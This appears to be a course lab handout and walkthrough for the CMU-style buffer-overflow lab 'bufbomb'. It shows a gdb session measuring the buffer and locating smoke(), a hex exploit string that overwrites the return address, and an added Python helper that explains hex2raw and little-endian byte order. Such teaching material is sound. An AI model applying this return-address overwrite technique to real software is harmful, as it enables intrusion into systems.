Introduction
organization. It involves applying a series of buffer overflow attacks on an executable file bufbomb.
Note: In this project, you will gain firsthand experience with one of the methods commonly used to exploit
security weaknesses in operating systems and network servers. Our purpose is to help you learn about the
runtime operation of programs and to understand the nature of this form of security weakness so that you
can avoid it when you write system code. We do not condone the use of this or any other form of attack to
gain unauthorized access to any system resources. There are criminal statutes governing such activities.
Logistics
As usual, this is an individual project. We generated the project using gcc's -m32 flag, so all code produced by the compiler follows IA-32 rules,
even if the host is an x86-64 system. This should be enough to convince you that the compiler can use any
calling convention it wants, so long as it's consistent.
Hand Out Instructions
You can obtain your buffer bomb by pointing your Web browser at:
http://bert.cs.uic.edu:15213/
The server will return a tar file called buflab-handout.tar to your browser. Start by copying buflab-handout.tar to a (protected) directory in which you plan to do your work. Then give the command "tar xvf buflab-handout.tar". This will create a directory called buflab-handout containing the following three executable files: After you untar the handout, change your terminal's working directory to the buflab-handout folder.
Example
Generate your cookie with ./makecookie "your netid":
[plueonde@bert buflab-handout]$ ./makecookie plueon2
Test out the bufbomb:
[plueonde@bert buflab-handout]$ ./bufbomb -u plueon2
Userid: plueon2
Cookie: 0x34fd7256
Type string:abcdefg <= your string
Dud: getbuf returned 0x1 <= status
Better luck next time
Now you have to find the length of the buffer. To do that, open bufbomb in gdb and set a breakpoint at getbuf:
[plueonde@bert buflab-handout]$ gdb bufbomb
GNU gdb (GDB) Red Hat Enterprise Linux (7.0.1-45.el5)
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /mnt_nfs/home3/ugrad3/plueonde/Downloads/buflab-handout/bufbomb...(no debugging symbols found)...done.
(gdb) b getbuf
Breakpoint 1 at 0x8049088
Run bufbomb with your userid:
(gdb) r -u plueon2
Starting program: /mnt_nfs/home3/ugrad3/plueonde/Downloads/buflab-handout/bufbomb -u plueon2
Userid: plueon2
Cookie: 0x34fd7256
Breakpoint 1, 0x08049088 in getbuf ()
The goal of phase 0 is to overflow the buffer in getbuf and overwrite its return address with the address of smoke.
Check the length of the buffer and look up the address of smoke. Once you have both, quit gdb.
(gdb) p/d ($ebp-$esp)
$1 = 40 <= length of the buffer
(gdb) disas smoke
Dump of assembler code for function smoke:
0x08048ca3 <smoke+0>: push %ebp <= address of the smoke function
0x08048ca4 <smoke+1>: mov %esp,%ebp
0x08048ca6 <smoke+3>: sub $0x8,%esp
0x08048ca9 <smoke+6>: movl $0x804a1db,(%esp)
0x08048cb0 <smoke+13>: call 0x80488d0 <puts@plt>
0x08048cb5 <smoke+18>: movl $0x0,(%esp)
0x08048cbc <smoke+25>: call 0x80490a0 <validate>
0x08048cc1 <smoke+30>: movl $0x0,(%esp)
0x08048cc8 <smoke+37>: call 0x8048930 <exit@plt>
End of assembler dump.
(gdb) quit
Next, create the buffer overflow that transfers control to the smoke function.
Write the bytes as hex in a text file and use hex2raw to convert them into the raw string.
Fill the buffer with bytes of 61 (the letter 'a' in hexadecimal), followed by the address of the smoke function in reverse byte order (little-endian):
[plueonde@bert buflab-handout]$ vim exploit.txt
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
a3 8c 04 08
Save the file and test it out
[plueonde@bert buflab-handout]$ cat exploit.txt | ./hex2raw | ./bufbomb -u plueon2
Userid: plueon2
Cookie: 0x34fd7256
Type string:Smoke!: You called smoke() <= task complete
VALID
NICE JOB!
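The hex2raw step is easier to see with a short script. The following Python is an added example, not part of this post or of the lab's own tools: it reads hex2raw-style text (two hex digits per byte, separated by whitespace) into raw bytes, then decodes the four bytes that follow the padding as a little-endian IA-32 address, which is why the address of smoke, 0x08048ca3, is written in the file as a3 8c 04 08. The sample input is constructed from the exploit.txt shown above (36 padding bytes, as counted from that file); the stripping of C-style block comments is an assumption about how hex2raw treats its input.

```python
import re

# Constructed sample: the post's exploit.txt for phase 0, 36 bytes of 0x61 ('a')
# followed by the address of smoke (0x08048ca3) written least-significant byte first.
EXPLOIT_TXT = " ".join(["61"] * 36) + "\na3 8c 04 08\n"

SMOKE_ADDR = 0x08048ca3   # from the post's "disas smoke" output
PADDING_LEN = 36          # number of filler bytes in the post's exploit.txt


def hex2raw(text):
    """Convert hex2raw-style text (two hex digits per byte, whitespace separated)
    into raw bytes. Stripping /* ... */ comments is an assumption about the tool;
    check the behaviour of your copy of hex2raw."""
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    out = bytearray()
    for tok in text.split():
        if not re.fullmatch(r"[0-9a-fA-F]{2}", tok):
            raise ValueError(f"bad hex byte {tok!r}: each token must be exactly two hex digits")
        out.append(int(tok, 16))
    return bytes(out)


def describe_payload(raw, padding_len):
    """Split a raw payload into its padding and the 4-byte value written after it,
    decoding that value as a little-endian (reversed) IA-32 pointer."""
    if len(raw) < padding_len + 4:
        raise ValueError("payload too short to hold the padding plus a 4-byte address")
    addr_bytes = raw[padding_len:padding_len + 4]
    return {
        "length": len(raw),
        "padding": raw[:padding_len],
        "address": int.from_bytes(addr_bytes, "little"),
        # A 0x0a byte inside the payload would end the line early when the
        # string is read, so it is worth flagging before trying the input.
        "has_newline": b"\n" in raw,
    }


if __name__ == "__main__":
    raw = hex2raw(EXPLOIT_TXT)
    info = describe_payload(raw, PADDING_LEN)
    print(f"{info['length']} bytes: {len(info['padding'])} padding bytes, "
          f"then address 0x{info['address']:08x}, newline inside: {info['has_newline']}")
```

Running the script on the constructed input reports 40 bytes, 36 of padding, and the decoded address 0x08048ca3, matching the target the post found with "disas smoke"; a mistyped byte pair (for example a single hex digit) is rejected with an error instead of silently shifting the rest of the string.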
Can you explain please when you say "using hex2raw to generate string"?